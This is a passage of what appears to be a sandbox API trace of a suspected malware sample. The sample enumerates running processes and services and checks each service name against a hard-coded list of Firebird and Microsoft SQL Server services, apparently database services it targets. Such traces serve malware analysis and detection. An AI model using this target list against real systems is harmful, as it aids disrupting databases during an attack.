pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0204.487] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0204.487] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0204.487] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0204.487] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0204.488] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0204.488] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0204.489] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0204.489] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0204.490] lstrlenW (lpString="larent.exe") returned 10 [0204.490] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0204.490] lstrlenW (lpString="stereo.exe") returned 10 [0204.490] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0204.491] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0204.491] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0204.492] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0204.492] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0204.493] lstrlenW (lpString="state.exe") returned 9 [0204.493] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0204.494] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0204.494] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.495] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0204.495] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0204.495] lstrlenW (lpString="taskhostw.exe") returned 13 [0204.495] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0204.496] lstrlenW (lpString="sppsvc.exe") returned 10 [0204.496] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.497] lstrlenW (lpString="svchost.exe") returned 11 [0204.497] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0204.498] lstrlenW (lpString="Pg.exe") returned 6 [0204.498] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0204.499] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0204.499] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0204.500] lstrlenW (lpString="conhost.exe") returned 11 [0204.500] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0204.500] lstrlenW (lpString="cmd.exe") returned 7 [0204.500] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0204.501] lstrlenW (lpString="conhost.exe") returned 11 [0204.501] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0204.502] CloseHandle (hObject=0x3e4) returned 1 [0204.502] Sleep (dwMilliseconds=0x1f4) [0205.254] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236b8f0 [0205.255] EnumServicesStatusExW (in: hSCManager=0x236b8f0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0205.255] GetLastError () returned 0xea [0205.255] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x4811068 [0205.255] EnumServicesStatusExW (in: hSCManager=0x236b8f0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4811068, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4811068, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0205.256] CloseServiceHandle (hSCObject=0x236b8f0) returned 1 [0205.257] lstrlenW (lpString="Appinfo") returned 7 [0205.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0205.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0205.257] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0205.257] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0205.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0205.257] lstrlenW (lpString="AppXSvc") returned 7 [0205.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0205.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0205.257] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0205.257] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0205.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0205.257] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0205.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0205.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0205.257] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0205.257] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0205.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0205.257] lstrlenW (lpString="Audiosrv") returned 8 [0205.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0205.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0205.257] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0205.257] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0205.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0205.257] lstrlenW (lpString="BFE") returned 3 [0205.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0205.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0205.258] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0205.258] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0205.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0205.258] lstrlenW (lpString="BITS") returned 4 [0205.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0205.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0205.258] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0205.258] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0205.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0205.258] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0205.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0205.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0205.258] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0205.258] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0205.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0205.258] lstrlenW (lpString="CDPSvc") returned 6 [0205.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0205.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0205.258] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0205.258] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0205.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0205.258] lstrlenW (lpString="ClickToRunSvc") returned 13 [0205.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0205.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0205.258] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0205.258] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0205.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0205.259] lstrlenW (lpString="ClipSVC") returned 7 [0205.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0205.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0205.259] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0205.259] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0205.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0205.259] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0205.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0205.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0205.259] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0205.259] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0205.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0205.259] lstrlenW (lpString="CryptSvc") returned 8 [0205.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0205.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0205.259] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0205.259] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0205.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0205.259] lstrlenW (lpString="DcomLaunch") returned 10 [0205.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0205.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0205.259] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0205.259] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0205.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0205.259] lstrlenW (lpString="DeviceAssociationService") returned 24 [0205.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0205.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0205.259] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0205.260] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0205.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0205.260] lstrlenW (lpString="Dhcp") returned 4 [0205.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0205.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0205.260] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0205.260] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0205.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0205.260] lstrlenW (lpString="Dnscache") returned 8 [0205.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0205.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0205.260] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0205.260] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0205.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0205.260] lstrlenW (lpString="DoSvc") returned 5 [0205.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0205.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0205.260] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0205.260] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0205.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0205.260] lstrlenW (lpString="DPS") returned 3 [0205.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0205.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0205.260] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0205.260] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0205.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0205.260] lstrlenW (lpString="DusmSvc") returned 7 [0205.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0205.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0205.261] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0205.261] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0205.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0205.261] lstrlenW (lpString="EventLog") returned 8 [0205.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0205.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0205.261] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0205.261] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0205.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0205.261] lstrlenW (lpString="EventSystem") returned 11 [0205.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0205.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0205.261] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0205.261] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0205.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0205.261] lstrlenW (lpString="FontCache") returned 9 [0205.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0205.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0205.261] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0205.261] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0205.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0205.261] lstrlenW (lpString="gpsvc") returned 5 [0205.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0205.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0205.261] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0205.261] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0205.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0205.261] lstrlenW (lpString="iphlpsvc") returned 8 [0205.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0205.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0205.262] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0205.262] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0205.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0205.262] lstrlenW (lpString="KeyIso") returned 6 [0205.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0205.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0205.262] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0205.262] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0205.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0205.262] lstrlenW (lpString="LanmanServer") returned 12 [0205.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0205.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0205.262] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0205.262] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0205.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0205.262] lstrlenW (lpString="LanmanWorkstation") returned 17 [0205.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0205.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0205.262] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0205.262] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0205.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0205.262] lstrlenW (lpString="lfsvc") returned 5 [0205.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0205.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0205.262] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0205.262] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0205.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0205.263] lstrlenW (lpString="LicenseManager") returned 14 [0205.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0205.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0205.263] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0205.263] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0205.263] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0205.263] lstrlenW (lpString="lmhosts") returned 7 [0205.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0205.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0205.263] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0205.263] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0205.263] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0205.263] lstrlenW (lpString="LSM") returned 3 [0205.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0205.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0205.263] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0205.263] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0205.263] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0205.263] lstrlenW (lpString="MpsSvc") returned 6 [0205.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0205.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0205.263] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0205.263] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0205.263] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0205.263] lstrlenW (lpString="NcbService") returned 10 [0205.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0205.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0205.263] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0205.263] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0205.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0205.264] lstrlenW (lpString="netprofm") returned 8 [0205.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0205.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0205.264] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0205.264] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0205.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0205.264] lstrlenW (lpString="NlaSvc") returned 6 [0205.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0205.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0205.264] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0205.264] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0205.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0205.264] lstrlenW (lpString="nsi") returned 3 [0205.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0205.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0205.264] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0205.264] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0205.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0205.264] lstrlenW (lpString="PcaSvc") returned 6 [0205.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0205.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0205.264] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0205.264] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0205.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0205.264] lstrlenW (lpString="PlugPlay") returned 8 [0205.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0205.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0205.264] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0205.265] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0205.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0205.265] lstrlenW 